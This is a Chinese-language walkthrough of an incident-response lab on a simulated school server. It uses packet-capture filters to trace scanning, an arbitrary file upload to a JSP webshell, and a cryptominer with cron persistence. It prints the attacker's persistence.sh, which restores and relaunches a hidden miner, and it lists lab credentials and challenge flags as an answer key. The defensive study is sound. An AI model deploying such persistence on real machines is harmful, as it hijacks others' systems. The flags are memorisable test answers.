靶机介绍
背景:完全仿真了某学校长期未运营维护的程序,被黑客发现了漏洞,但好在学校有全流量设备,抓取到了过程中的流量包,需要你进行上机以及结合流量分析,排查攻击者利用的漏洞以及上传利用成功的木马,以及清除掉攻击者上传的挖矿程序以及后门程序,挖矿环境完全还原了真实环境,但不会出网,比较有意义,清除做了check操作,你只需要按照相关题目引导进行清除,在指定目录下查看flag提交即可,流量包在远程登录成功后/hacker2025.pcap(玄机直接以附件形式下载)
流量中被攻击机IP:192.168.77.32
SSH远程端口:2222 账号密码:root/edusec123
WEB端口为:19999你需要访问和流量进行还原攻击者路径,在注册账号登录成功后,下载首页的应急响应报告模板进行复现描述攻击过程以及加固流程,非常具有学习意义
环境地址:夸克网盘离线安装
[https://pan.quark.cn/s/9fde155741d6](https://pan.quark.cn/s/9fde155741d6()
解题思路
- 使用工具分析共有多少IP存在扫描web特征,提交其数量
1
2
|
//通过scp下载流量包到本地
scp -P 2222 root@192.168.77.32:/hacker2025.pcap ./
|
通过分析流量包受害主机IP为192.168.37.11,并且是Web扫描特征
1
2
3
4
5
6
|
ip.addr == 192.168.37.11 && http
http.response.code==404
30个左右
(192.168.37.100/192.168.37.103/192.168.37.104/192.168.37.107/192.168.37.108/192.168.37.109/192.168.37.110/192.168.37.111/192.168.37.112/192.168.37.113/114/115/116/117/34/35/36/37/38/39/40/41/42/43/44/10)
|
- 在2025.6.22日17点03分27秒,192.168.37.10,55689端口进行访问的url路径以flag方式进行提交(应急三要素缩小范围)
1
2
3
|
ip.addr == 192.168.37.10 && tcp.port == 55689
flag{192.168.37.11:8080/servlet/user/uploadAvatar}
|
- 提交存在使用NMAP扫描特征的IP
1
2
3
|
192.168.37.4
http.user_agent contains "nmap"
|
- 审计流量并结合web站点,攻击者通过什么漏洞进行控制主机,提交漏洞文件名接口
1
2
|
任意文件上传
/servlet/user/uploadAvatar
|
- 审计流量并结合web站点,攻击者通过哪个用户名利用的漏洞,提交其注册用户名
- 审计流量并结合漏洞,提交攻击者控制成功木马文件名
1
2
|
ip.addr == 192.168.37.11 && http && ip.addr == 192.168.37.10
/uploads/70b86b64-ce15-46bf-8095-4764809e2ee5.jsp
|
- 审计流量并清除掉攻击者上传的木马,清除成功后在/var/flag/1/flag中查看flag并提交
1
|
flag{1979c46c2af37dc62a4b05881e816995}
|
- 黑客拿到主机权限后,上传了挖矿木马,需要你提交矿池地址
查看计划任务,发现存在可疑任务,查看脚本内容,将miner.jar保存放微步沙箱运行,确认是挖矿程序
- 清除掉主机上的挖矿木马,完成后在/var/flag/2/flag文件中查看flag并提交
清除tmp目录下的挖矿程序可获得flag2
1
|
flag{da236fe0cda81bfc03d022799589110e}
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
|
oot@1818c9e077a4:/var/lib/tomcat9/webapps/ROOT/uploads# cat /usr/share/.per/persistence.sh
#!/bin/bash
SOURCE_FILE="/usr/share/.miner/miner.jar"
DEST_FILE="/tmp/miner.jar"
PROCESS_NAME="java -jar $DEST_FILE"
LOG_FILE="/var/log/.malware_events.log"
if pgrep -f "$PROCESS_NAME" > /dev/null; then
exit 0
else
echo "[$(date)] Miner process not found. Taking action..." >> "$LOG_FILE"
if [ ! -f "$DEST_FILE" ]; then
echo "[$(date)] Miner file ($DEST_FILE) is missing. Restoring from backup..." >> "$LOG_FILE"
cp "$SOURCE_FILE" "$DEST_FILE"
chmod +x "$DEST_FILE"
fi
if [ -f "$DEST_FILE" ]; then
nohup java -jar "$DEST_FILE" > /dev/null 2>&1 &
echo "[$(date)] Miner process restarted with PID $!." >> "$LOG_FILE"
else
echo "[$(date)] CRITICAL: Could not restore miner file from backup. Cannot start." >> "$LOG_FILE"
fi
|
- 黑客做了后门,即使你清除以后,仍然会定时更新挖矿程序并运行,你找到这个程序,提交其路径
1
2
|
恶意计划任务脚本文件路径:/usr/share/.per/persistence.sh
挖矿后门路径:/usr/share/.miner/miner.jar
|
- 清除掉后门挖矿程序,在/var/flag/3/flag下查看提交flag
1
|
flag{27bd067769b51ed71f899c7a6f08af2c}
|
